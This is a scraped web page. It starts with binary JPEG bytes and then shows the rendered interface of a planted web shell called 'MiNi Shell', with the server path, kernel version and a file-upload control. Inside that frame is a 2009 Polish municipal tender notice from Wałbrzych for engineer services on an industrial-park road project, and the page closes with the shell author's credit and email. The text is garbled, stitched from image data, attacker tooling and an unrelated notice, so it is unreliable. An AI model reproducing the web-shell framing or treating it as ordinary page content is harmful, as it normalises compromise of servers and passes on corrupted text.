JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090226/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090226/42870-N-2009.html

<p class="kh_header"><b>Wałbrzych: Pełnienie funkcji Inżyniera dla Przedsięwzięcia pn.: Budowa infrastruktury drogowej w celu udostępnienia nowych terenów inwestycyjnych o znaczeniu regionalnym w ramach Parku Przemysłowego w Wałbrzychu</b><br>
<b>Numer ogłoszenia: 42870 - 2009; data zamieszczenia: 26.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wałbrzych , Pl. Magistracki 1, 58-300 Wałbrzych, woj. dolnośląskie, tel. 074 6655153, 6655154, faks 074 6655155.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera dla Przedsięwzięcia pn.: Budowa infrastruktury drogowej w celu udostępnienia nowych terenów inwestycyjnych o znaczeniu regionalnym w ramach Parku Przemysłowego w Wałbrzychu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na pełnieniu funkcji Inżyniera w zakresie:
- doradztwa i przygotowania przetargu na wykonanie Dokumentacji Projektowej i Robót,
- nadzoru nad Dokumentacją Projektową,
- nadzoru nad Robotami,
- nadzoru finansowego,
- współpracy przy realizacji umów o finansowanie Przedsięwzięcia,

dla Przedsięwzięcia, 
Budowa infrastruktury drogowej w celu udostępnienia nowych terenów inwestycyjnych o znaczeniu regionalnym w ramach Parku Przemysłowego w Wałbrzychu
dla którego ma być wykonana Dokumentacja Projektowa i Roboty (w rozumieniu ustawy Prawo budowlane - zaprojektowanie i wykonanie robót budowlanych), zgodnie z wymaganiami prawa polskiego i procedur FIDIC.

Zakres rzeczowy Przedsięwzięcia obejmuje:
1)budowę układu drogowego - drogi nr 1, 5 i 6 oraz parkingu nr 1 dla autobusów i samochodów ciężarowych,
2)wykonanie makroniwelacji terenu dla budowy układu drogowego - drogi nr 1, 5 i 6 oraz dla utworzenia platformy do budowy parkingu nr 1, 
3)budowę sieci kanalizacji deszczowej grawitacyjnej i ciśnieniowej do odwodnienia dróg i parkingu, budowę przepompowni ścieków deszczowych, separatora produktów ropopochodnych oraz włączenie do istniejącej sieci kanalizacji deszczowej w ul. Jachimowicza,
4)budowę oświetlenia zewnętrznego w pasach drogowych dróg oraz na terenie parkingu wraz ze stacją transformatorową
5)wykonanie robót towarzyszących:
a.budowa włączenia drogi nr 1 do istniejącej drogi gminnej ul. Jachimowicza,
b.budowa zjazdów w granicach pasa drogowego:
- z drogi nr 1 na działki: nr 2, 3, 4, 5, 6, 7, 8, 11, 13,
- z drogi nr 5 na działki: nr 9, 10, 12, 14 oraz parking nr 1,
- z drogi nr 6 na działkę nr 16,
c.wykonanie pasów zieleni towarzyszącej komunikacji drogowej (nasadzenie żywopłotu po obu stronach dróg),
d.wykonanie urządzeń zapewniających przepływ i odpływ wód opadowych z terenów sąsiednich.
e.usuniecie istniejących drzew,
f.wykopy i nasypy (konstrukcyjne) poza pasem drogowym dróg nr 1, 5 i 6 niezbędne dla budowy tego układu drogowego związane z istniejącymi warunkami wysokościowymi terenów przyległych do projektowanych dróg
Szczegółowy opis Przedsięwzięcia oraz wymagania Zamawiającego zostały określone w Programie Funkcjonalno-Użytkowym stanowiącym załącznik D do projektu umowy.
Przedsięwzięcie jest współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007 - 2013 - Priorytet 3. Rozwój infrastruktury transportowej na Dolnym Śląsku - Działanie 3.1 Infrastruktura drogowa..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.63.13.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w wysokości 10.000,00 PLN (dziesięć tysięcy złotych) najpóźniej do dnia 13.03.2009r do godz 11:00.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy ubiegający się o zamówienie  publiczne będące przedmiotem niniejszego postępowania muszą spełniać niżej wymienione warunki udziału w postępowaniu:
1) Posiadać  uprawnienia niezbędne do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia. 
2) Nie podlegać wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 z ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2007 Nr 223, poz. 1655 ze zm.). W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich:
3) Posiadać niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponować osobami zdolnymi do wykonania niniejszego zamówienia. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie zamówienia, oceniany będzie łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie:
a1)  wykonali usługi polegające na przygotowaniu Specyfikacji Istotnych Warunków Zamówienia i uczestnictwie Wykonawcy w pracach komisji przetargowej dla postępowań o udzielenie zamówienia publicznego na roboty budowlane min. dla trzech inwestycji. 
a2) wykonali minimum 1 usługę polegającą na wykonaniu dokumentacji projektowej lub dokonaniu sprawdzenia dokumentacji projektowej wraz z przygotowaniem koreferatu ze sprawdzenia dokumentacji projektowej na budowę (definicja budowy zgodna z ustawą z dnia 7 lipca 1994 roku - Prawo budowlane tj. Dz.U. Z 2006 Nr 156 poz. 1118 ze zm.) dróg publicznych w rozumieniu ustawy z dnia 21 marca 1985 o drogach publicznych (Dz.U. 2007 Nr 19 poz 115 ze zm.);
a3) wykonali minimum 3 usługi Inwestora zastępczego lub Inżyniera kontraktu/Inżyniera lub usług równoważnych  dla budowy (definicja budowy zgodna z ustawą z dnia 7 lipca 1994 roku - Prawo budowlane tj. Dz.U. Z 2006 Nr 156 poz. 1118 ze zm.) dróg publicznych w rozumieniu ustawy z dnia 21 marca 1985 o drogach publicznych (Dz.U. 2007 Nr 19 poz 115 ze zm.);
b1) dysponują osobą, która będzie pełnić funkcję koordynatora inwestycji lub kierownika projektu lub równoważne, która (łącznie):
b1.1) posiada wykształcenie wyższe;
b1.2) posiada minimum 5 letnie doświadczenie zawodowe;
b1.3) pełniła w okresie ostatnich 5 lat funkcję koordynatora inwestycji lub kierownika projektu lub równoważne przy realizacji co najmniej 2 inwestycji budowlanych
b.1.4) pracowała w zespole Personelu Inżyniera/Inwestora Zastępczego na co najmniej jednej budowie realizowanej według procedur realizacji inwestycji FIDIC
b2) dysponują osobą, która będzie pełnić funkcję specjalisty ds. rozliczeń, która (łącznie):
b2.1) posiada wykształcenie wyższe;
b2.2) posiada minimum 5 letnie doświadczenie zawodowe w zakresie rozliczeń finansowo-rzeczowych zadań inwestycyjnych;
b3) dysponują osobami, które będą sprawdzać dokumentację projektową w poszczególnych branżach, posiadającymi uprawnienia budowlane do projektowania bez ograniczeń i sprawdzania projektantów architektoniczno-budowlanych w następujących specjalnościach:
b3.1) drogowej - min. 1 osoba;
b3.2) konstrukcyjno-budowlanej - min. 1 osoba;
b3.3) instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych - min. 1 osoba;
b3.4) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - min. 1 osoba
Przy czym każda z osób legitymujących się wymaganymi uprawnieniami musi posiadać doświadczenie w okresie ostatnich 5 lat w wykonywaniu dokumentacji projektowych lub sprawdzaniu i opracowaniu koreferatu ze sprawdzenia co najmniej jednej dokumentacji projektowej w swojej specjalności na realizację budowy i uzbrojenia infrastrukturalnego dróg publicznych w rozumieniu ustawy z dnia 21 marca 1985 o drogach publicznych (Dz.U. 2007 Nr 19 poz 115 ze zm.);
Zamawiający dopuszcza możliwość łączenia uprawnień w poszczególnych specjalnościach.
b4) dysponują osobami, które będą pełnić funkcję inspektorów nadzoru robót branżowych, posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w następujących specjalnościach:
b4.1) drogowej - min. 1 osoba;
b4.2) konstrukcyjno-budowlanej - min. 1 osoba;
b4.3) instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych - min. 1 osoba;
b4.4) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - min. 1 osoba
Przy czym każda z osób legitymujących się wymaganymi uprawnieniami musi posiadać doświadczenie w okresie ostatnich 5 lat w pełnieniu funkcji inspektora nadzoru w specjalności na  realizację budowy i uzbrojenia infrastrukturalnego dróg publicznych w rozumieniu ustawy z dnia 21 marca 1985 o drogach publicznych (Dz.U. 2007 Nr 19 poz 115 ze zm.).
Zamawiający dopuszcza możliwość łączenia uprawnień w poszczególnych specjalnościach.
b5) dysponują osobą, która będzie pełnić rolę specjalisty ds. prawnych podczas realizacji zamówienia, która (łącznie):
b5.1) posiada wykształcenie wyższe prawnicze;
b5.2) posiada min. 5 letnie doświadczenie w obsłudze prawnej inwestycji.
b6) dysponują osobą, która będzie pełnić rolę specjalisty ds. zamówień publicznych, która (łącznie):
b6.1) posiada wykształcenie wyższe;
b6.2) brała udział w przygotowaniu Specyfikacji Istotnych Warunków Zamówienia i uczestniczyła w pracach komisji przetargowych postępowań o udzielenie zamówienia publicznego na roboty budowlane min. dla trzech inwestycji.
4) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązania są przedłożyć następujące dokumenty w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem:
Ocena spełnienia ww. warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia,w oparciu o informacje zawarte w dokumentach i oświadczeniach. Zamawiający zastrzega sobie prawo weryfikacji złożonych przez Wykonawcę dokumentów i oświadczeń..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Ad 1a)  Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej  wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku gdy  wykonawcą jest podmiot zobowiązany do rejestracji w  Krajowym  Rejestrze Sądowym, a w załączonym odpisie z rejestru nie uwzględniono zmian w tekście dokumentu, wykonawca dodatkowo zobowiązany jest do dołączenia do oferty dowodu złożenia w sądzie rejestrowym ww. zmian. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich (załącznik nr 2).
Ad 2a) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24, ust. 1 pkt 4 - 8 ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (załącznik nr 3).
Ad 2b) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24, ust. 1 pkt 9 ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (załącznik nr 4). 
Ad 2c) Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (załącznik nr 5).
Ad 2d) Oświadczenie o spełnieniu warunków udziału w postępowaniu art. 22 ust 1 PZP oraz nie podleganiu wykluczeniu z udziału w postępowaniu art. 24 ust. 1 i 2 PZP (formularz oferty). 
Ad 3 pkt a1-a3) Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych, również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, licząc wstecz od daty ogłoszenie postępowania z podaniem przedmiotu, dat wykonania i odbiorców oraz wartości wraz z dokumentami potwierdzającymi, że zamówienia te zostały wykonane należycie (załącznik nr 6):
Ad 3 pkt b1 - b6) Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności z podziałem na n/w osoby załącznik nr 7 i/lub pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w przedmiotowym wykazie wykonawca wskazał osoby, którymi będzie dysponował
W celu potwierdzenia spełnienia w/w warunków do załącznika nr 7 dla każdej z tych osób wymienionych w pkt. b3 i b4 należy przedłożyć dokumenty stwierdzające ich uprawnienia do wykonywania samodzielnych funkcji w budownictwie oraz zaświadczenia o wpisie na listę odpowiednich izb samorządu zawodowego lub odpowiednie certyfikaty (świadectwa).
Ad 4a) polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej zgodnej z przedmiotem zamówienia na kwotę nie niższą niż 1,0 mln PLN. W przypadku, gdy Wykonawca przedstawi polisę o wartości wyrażonej w innej walucie niż PLN, Zamawiający dokona przeliczenia na PLN po kursie ogłoszonym przez Narodowy Bank Polski dla danej waluty z dnia publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych (załącznik nr 8);
Ad 4b) Informacja z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy w wysokości co najmniej 150 000,00zł, wystawionej nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert (załącznik nr 9).
Wykonawcy zagraniczni:
Wykonawca zagraniczny (mający siedzibę lub miejsce zamieszkania poza terytorium Polski) zamiast dokumentów wskazanych  w pkt. 5 SIWZ składa dokument lub dokumenty wystawiane w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1. nie otwarto likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2. nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
3. nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4. zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia lub zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy PZP wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
5. Jeżeli w kraju pochodzenie osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawione z odpowiednią datą wymaganą dla tych dokumentów. 
Dokumenty żądane na potwierdzenie spełnienia wymaganych warunków Wykonawca może dołączyć w formie kserokopii poświadczonej przez niego za zgodność z oryginałem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.walbrzych.pl/zzp/inzynierparkprzemyslowydrogi.zip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Wałbrzych
Pl. Magistracki 1
58-300 Wałbrzych
pok. nr 27.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.03.2009 godzina 11:00, miejsce: Gmina Wałbrzych
Pl. Magistracki 1
58-300 Wałbrzych
pok. nr 10.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com